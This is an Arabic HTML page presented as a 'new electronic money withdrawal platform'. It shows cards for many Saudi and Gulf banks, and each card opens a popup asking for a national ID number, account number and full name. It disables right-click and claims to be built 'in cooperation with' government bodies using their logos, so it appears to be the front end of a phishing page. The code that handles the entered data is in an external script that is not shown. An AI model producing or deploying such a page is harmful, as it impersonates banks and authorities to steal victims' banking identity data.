<!DOCTYPE html>
<html lang="ar" dir="rtl">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>منصة سحب الاموال</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta2/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-BmbxuPwQa2lc/FVzBcNJ7UAyJxM6wuqIj61tLrc4wSX0szH/Ev+nYRRuWlolflfl" crossorigin="anonymous">
    <link rel="stylesheet" href="style/page-1.css">
    <link href="https://fonts.googleapis.com/css2?family=Almarai:wght@300&amp;display=swap" rel="stylesheet">
    <!-- <script src="/javascript/Right_Click.js"></script> -->
</head>

<body oncontextmenu="return false;">
    <div class="modal" id="modal">
        <div class="modal-content" id="modal-content">
            <h3>تفاصيل المستخدم</h3>
            <div>
                <div>
                    <img class="bank-logo-img" id="logo-popup" alt="bank-logo">
                    <div class="row popup-bank">
                        <label id="" for="">رقم الهوية</label>
                        <input type="text" id="" required>
                        <label id="error-1" for=""></label>
                    </div>
                    <div class="row popup-bank">
                        <label id="" for="">رقم الحساب</label>
                        <input type="text" id="" required>
                        <label id="error-1" for=""></label>
                    </div>
                    <div class="row popup-bank">
                        <label id="" for="">الاسم الكامل</label>
                        <input type="text" id="" required>
                        <label id="error-1" for=""></label>
                    </div>
                </div>
            </div>
            <button class="btnSearch" id="" onclick="closes()">موافق</button>
        </div>
    </div>
    <header>
        <div class="head-title">
            <img src="" alt="">
            <h1>منصة سحب الاموال الالكترونية الجديدة</h1>
        </div>
    </header>
    <div class="row row-space-bittwen">
        <div class="col bank-card" onclick="run('1')">
            <img class="bank-logo-img" src="image/Banks-Logo/Bank-1.png" alt="">
            <div>
                <label for="">بنك الرياض</label>
            </div>
            <div>
                <label for="">(اضغط هنا)</label>
            </div>
        </div>
        <div class="col bank-card" onclick="run(2)">
            <img class="bank-logo-img" src="image/Banks-Logo/Bank-2.png" alt="">
            <div>
                <label for="">بنك الجزيرة</label>
            </div>
            <div>
                <label for="">(اضغط هنا)</label>
            </div>
        </div>
        <div class="col bank-card" onclick="run(3)">
            <img class="bank-logo-img" src="image/Banks-Logo/Bank-3.png" alt="">
            <div>
                <label for="">بنك السعودي للاستثمار</label>
            </div>
            <div>
                <label for="">(اضغط هنا)</label>
            </div>
        </div>
    </div>
    <div class="row row-space-bittwen">
        <div class="col bank-card" onclick="run(4)">
            <img class="bank-logo-img" src="image/Banks-Logo/Bank-4.png" alt="">
            <div>
                <label for="">بنك الراجحي</label>
            </div>
            <div>
                <label for="">(اضغط هنا)</label>
            </div>
        </div>
        <div class="col bank-card" onclick="run(5)">
            <img class="bank-logo-img" src="image/Banks-Logo/Bank-5.png" alt="">
            <div>
                <label for="">بنك البلاد</label>
            </div>
            <div>
                <label for="">(اضغط هنا)</label>
            </div>
        </div>
        <div class="col bank-card" onclick="run(6)">
            <img class="bank-logo-img" src="image/Banks-Logo/Bank-6.png" alt="">
            <div>
                <label for="">بنك سامبا</label>
            </div>
            <div>
                <label for="">(اضغط هنا)</label>
            </div>
        </div>
    </div>
    <div class="row row-space-bittwen">
        <div class="col bank-card" onclick="run(7)">
            <img class="bank-logo-img" src="image/Banks-Logo/Bank-7.png" alt="">
            <div>
                <label for="">بنك العربي</label>
            </div>
            <div>
                <label for="">(اضغط هنا)</label>
            </div>
        </div>
        <div class="col bank-card" onclick="run(8)">
            <img class="bank-logo-img" src="image/Banks-Logo/Bank-8.png" alt="">
            <div>
                <label for="">بنك الاهلي</label>
            </div>
            <div>
                <label for="">(اضغط هنا)</label>
            </div>
        </div>
        <div class="col bank-card" onclick="run(9)">
            <img class="bank-logo-img" src="image/Banks-Logo/Bank-9.png" alt="">
            <div>
                <label for="">بنك الانماء</label>
            </div>
            <div>
                <label for="">(اضغط هنا)</label>
            </div>
        </div>

    </div>
    <div class="row">
        <div class="col bank-card" onclick="run(10)">
            <img class="bank-logo-img" src="image/Banks-Logo/Bank-10.png" alt="">
            <div>
                <label for="">بنك السعودي الفرنسي</label>
            </div>
            <div>
                <label for="">(اضغط هنا)</label>
            </div>
        </div>
        <div class="col bank-card" onclick="run(11)">
            <img class="bank-logo-img" src="image/Banks-Logo/Bank-11.png" alt="">
            <div>
                <label for="">بنك ساب</label>
            </div>
            <div>
                <label for="">(اضغط هنا)</label>
            </div>
        </div>
        <div class="col bank-card" onclick="run(12)">
            <img class="bank-logo-img" src="image/Banks-Logo/Bank-12.png" alt="">
            <div>
                <label for="">بنك السعودي الهولندي</label>
            </div>
            <div>
                <label for="">(اضغط هنا)</label>
            </div>
        </div>
    </div>
    <div class="row">
        <div class="col bank-card" onclick="run(13)">
            <img class="bank-logo-img" src="image/Banks-Logo/Bank-13.png" alt="">
            <div>
                <label for="">بنك الخليج الدولي</label>
            </div>
            <div>
                <label for="">(اضغط هنا)</label>
            </div>
        </div>
        <div class="col bank-card" onclick="run(14)">
            <img class="bank-logo-img" src="image/Banks-Logo/Bank-14.png" alt="">
            <div>
                <label for="">بنك الوطني</label>
            </div>
            <div>
                <label for="">(اضغط هنا)</label>
            </div>
        </div>
        <div class="col bank-card" onclick="run(19)">
            <img class="bank-logo-img" src="image/Banks-Logo/Bank-19.png" alt="">
            <div>
                <label for="">بنك الامارات دبي الوطني</label>
            </div>
            <div>
                <label for="">(اضغط هنا)</label>
            </div>
        </div>
    </div>

    <footer>
        <div>
            <h3>بني هذا النظام بالتعاون مع</h3>
        </div>
        <div class="row">
            <img class="foteer-logo-gov" src="image/gov/giv-2.png" alt="">
            <img class="foteer-logo-gov" src="image/gov/giv-3.png" alt="">
            <img class="foteer-logo-gov" src="image/gov/giv-4.png" alt="">
            <!-- <img class="foteer-logo-gov" src="/image/Banks-Logo/Bank-17.png" alt=""> -->
        </div>
    </footer>
    <script src="javascript/popup.js"></script>
</body>

</html>